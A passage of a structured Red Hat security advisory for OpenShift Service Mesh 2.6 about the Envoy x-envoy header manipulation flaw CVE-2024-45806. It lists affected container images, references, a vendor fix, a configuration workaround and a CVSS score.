"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45806"
},
{
"category": "external",
"summary": "RHBZ#2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45806",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45806"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf"
}
],
"release_date": "2024-09-20T00:15:02.293000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Potential to manipulate `x-envoy` headers from external sources"
},
{
"cve": "CVE-2024-45808",
